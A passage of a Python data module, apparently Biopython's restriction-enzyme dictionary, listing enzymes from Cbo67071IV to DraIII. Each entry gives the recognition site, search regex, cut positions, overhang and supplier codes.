'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCRGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cbo67071IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNGAAAY'),
'compsite': '(?=(?P<Cch467III>G.GAAA[CT]))|(?=(?P<Cch467III_as>[AG]TTTC.C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNGAAAY',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cch467III'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'GGARGA'),
'compsite': '(?=(?P<CchII>GGA[AG]GA))|(?=(?P<CchII_as>TC[CT]TCC))',
'dna': None,
'freq': 2048.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGARGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CchII'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'CCCAAG'),
'compsite': '(?=(?P<CchIII>CCCAAG))|(?=(?P<CchIII_as>CTTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CchIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCATGA'),
'compsite': '(?=(?P<CciI>TCATGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCATGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['CciI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCGGCCGC'),
'compsite': '(?=(?P<CciNI>GCGGCCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGGCCGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['CciNI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGGTDA'),
'compsite': '(?=(?P<Cco14983V>GGGT[AGT]A))|(?=(?P<Cco14983V_as>T[ACT]ACCC))',
'dna': None,
'freq': 1365.3333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGTDA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cco14983V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCYGA'),
'compsite': '(?=(?P<Cco14983VI>GC[CT]GA))|(?=(?P<Cco14983VI_as>TC[AG]GC))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCYGA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cco14983VI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGACCAG'),
'compsite': '(?=(?P<CcrNAIII>CGACCAG))|(?=(?P<CcrNAIII_as>CTGGTCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGACCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CcrNAIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGCAG'),
'compsite': '(?=(?P<Cdi11397I>GCGCAG))|(?=(?P<Cdi11397I_as>CTGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cdi11397I'] = _temp()
def _temp():
return {
'charac': (4, -1, None, None, 'CATCG'),
'compsite': '(?=(?P<CdiI>CATCG))|(?=(?P<CdiI_as>CGATG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATCG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CdiI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'GCGGAG'),
'compsite': '(?=(?P<CdpI>GCGGAG))|(?=(?P<CdpI_as>CTCCGC))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CdpI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTGAAG'),
'compsite': '(?=(?P<Cdu23823II>GTGAAG))|(?=(?P<Cdu23823II_as>CTTCAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cdu23823II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCGC'),
'compsite': '(?=(?P<CfoI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('M', 'R', 'S'),
}
rest_dict['CfoI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RCCGGY'),
'compsite': '(?=(?P<Cfr10I>[AG]CCGG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Cfr10I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<Cfr13I>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Cfr13I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CCGCGG'),
'compsite': '(?=(?P<Cfr42I>CCGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Cfr42I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCGGG'),
'compsite': '(?=(?P<Cfr9I>CCCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Cfr9I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'YGGCCR'),
'compsite': '(?=(?P<CfrI>[CT]GGCC[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CfrI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCANCC'),
'compsite': '(?=(?P<CfrMH13II>AGCA.CC))|(?=(?P<CfrMH13II_as>GG.TGCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCANCC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CfrMH13II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTAAAG'),
'compsite': '(?=(?P<CfrMH16VI>CTAAAG))|(?=(?P<CfrMH16VI_as>CTTTAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CfrMH16VI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GARCAG'),
'compsite': '(?=(?P<Cfupf3II>GA[AG]CAG))|(?=(?P<Cfupf3II_as>CTG[CT]TC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GARCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cfupf3II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCGCA'),
'compsite': '(?=(?P<Cgl13032I>GGCGCA))|(?=(?P<Cgl13032I_as>TGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cgl13032I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACGABGG'),
'compsite': '(?=(?P<Cgl13032II>ACGA[CGT]GG))|(?=(?P<Cgl13032II_as>CC[ACG]TCGT))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGABGG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cgl13032II'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GATC'),
'compsite': '(?=(?P<ChaI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ChaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GKAAGC'),
'compsite': '(?=(?P<Cje265V>G[GT]AAGC))|(?=(?P<Cje265V_as>GCTT[AC]C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKAAGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cje265V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GKAAYC'),
'compsite': '(?=(?P<Cje54107III>G[GT]AA[CT]C))|(?=(?P<Cje54107III_as>G[AG]TT[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKAAYC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cje54107III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCAAGG'),
'compsite': '(?=(?P<CjeFIII>GCAAGG))|(?=(?P<CjeFIII_as>CCTTGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAAGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeFIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGRCA'),
'compsite': '(?=(?P<CjeFV>GG[AG]CA))|(?=(?P<CjeFV_as>TG[CT]CC))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGRCA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeFV'] = _temp()
def _temp():
return {
'charac': (-8, -25, 26, 9, 'CCANNNNNNGT'),
'compsite': '(?=(?P<CjeI>CCA......GT))|(?=(?P<CjeI_as>AC......TGG))',
'dna': None,
'freq': 1024.0,
'fst3': -25,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 6,
'ovhgseq': 'NNNNNN',
'results': None,
'scd3': 9,
'scd5': 26,
'site': 'CCANNNNNNGT',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGNNNNNGT'),
'compsite': '(?=(?P<CjeNII>GAG.....GT))|(?=(?P<CjeNII_as>AC.....CTC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGNNNNNGT',
'size': 10,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeNII'] = _temp()
def _temp():
return {
'charac': (25, 17, None, None, 'GKAAYG'),
'compsite': '(?=(?P<CjeNIII>G[GT]AA[CT]G))|(?=(?P<CjeNIII_as>C[AG]TT[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': 17,
'fst5': 25,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKAAYG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeNIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCYGA'),
'compsite': '(?=(?P<CjeNV>CC[CT]GA))|(?=(?P<CjeNV_as>TC[AG]GG))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCYGA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeNV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACNNNNNNNGAA'),
'compsite': '(?=(?P<CjeP659IV>CAC.......GAA))|(?=(?P<CjeP659IV_as>TTC.......GTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNNNNNGAA',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeP659IV'] = _temp()
def _temp():
return {
'charac': (-7, -25, 26, 8, 'CCANNNNNNNTC'),
'compsite': '(?=(?P<CjePI>CCA.......TC))|(?=(?P<CjePI_as>GA.......TGG))',
'dna': None,
'freq': 1024.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 6,
'ovhgseq': 'NNNNNN',
'results': None,
'scd3': 8,
'scd5': 26,
'site': 'CCANNNNNNNTC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjePI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAYNNNNNRTG'),
'compsite': '(?=(?P<CjuI>CA[CT].....[AG]TG))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAYNNNNNRTG',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjuI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAYNNNNNCTC'),
'compsite': '(?=(?P<CjuII>CA[CT].....CTC))|(?=(?P<CjuII_as>GAG.....[AG]TG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAYNNNNNCTC',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjuII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGAA'),
'compsite': '(?=(?P<Cla11845III>GCGAA))|(?=(?P<Cla11845III_as>TTCGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGAA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cla11845III'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<ClaI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'),
}
rest_dict['ClaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AAAAGRG'),
'compsite': '(?=(?P<Cly7489II>AAAAG[AG]G))|(?=(?P<Cly7489II_as>C[CT]CTTTT))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAAAGRG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cly7489II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGGAAG'),
'compsite': '(?=(?P<Cma23826I>CGGAAG))|(?=(?P<Cma23826I_as>CTTCCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cma23826I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGGWCCG'),
'compsite': '(?=(?P<CpoI>CGG[AT]CCG))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGWCCG',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['CpoI'] = _temp()
def _temp():
return {
'charac': (10, 10, None, None, 'GACGC'),
'compsite': '(?=(?P<CseI>GACGC))|(?=(?P<CseI_as>GCGTC))',
'dna': None,
'freq': 1024.0,
'fst3': 10,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['CseI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCWGGT'),
'compsite': '(?=(?P<CsiI>ACC[AT]GGT))',
'dna': None,
'freq': 8192.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCWGGT',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['CsiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGAGGC'),
'compsite': '(?=(?P<Csp2014I>GGAGGC))|(?=(?P<Csp2014I_as>GCCTCC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGAGGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Csp2014I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTAC'),
'compsite': '(?=(?P<Csp6I>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Csp6I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<CspAI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['CspAI'] = _temp()
def _temp():
return {
'charac': (-11, -25, 24, 10, 'CAANNNNNGTGG'),
'compsite': '(?=(?P<CspCI>CAA.....GTGG))|(?=(?P<CspCI_as>CCAC.....TTG))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'CAANNNNNGTGG',
'size': 12,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CspCI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGGWCCG'),
'compsite': '(?=(?P<CspI>CGG[AT]CCG))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGWCCG',
'size': 7,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['CspI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'AAGGAG'),
'compsite': '(?=(?P<CstMI>AAGGAG))|(?=(?P<CstMI_as>CTCCTT))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CstMI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CATG'),
'compsite': '(?=(?P<CviAII>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CviAII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGCY'),
'compsite': '(?=(?P<CviJI>[AG]GC[CT]))',
'dna': None,
'freq': 64.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCY',
'size': 4,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['CviJI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGCY'),
'compsite': '(?=(?P<CviKI_1>[AG]GC[CT]))',
'dna': None,
'freq': 64.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCY',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CviKI_1'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTAC'),
'compsite': '(?=(?P<CviQI>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CviQI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TGCA'),
'compsite': '(?=(?P<CviRI>TGCA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCA',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CviRI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCWGG'),
'compsite': '(?=(?P<Dde51507I>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Dde51507I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTNAG'),
'compsite': '(?=(?P<DdeI>CT.AG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTNAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['DdeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGCGCC'),
'compsite': '(?=(?P<DinI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['DinI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GATC'),
'compsite': '(?=(?P<DpnI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'E', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['DpnI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<DpnII>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['DpnII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTTAAA'),
'compsite': '(?=(?P<DraI>TTTAAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTTAAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['DraI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGNCCY'),
'compsite': '(?=(?P<DraII>[AG]GG.CC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGNCCY',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DraII'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CACNNNGTG'),
'compsite': '(?=(?P<DraIII>CAC...GTG))',
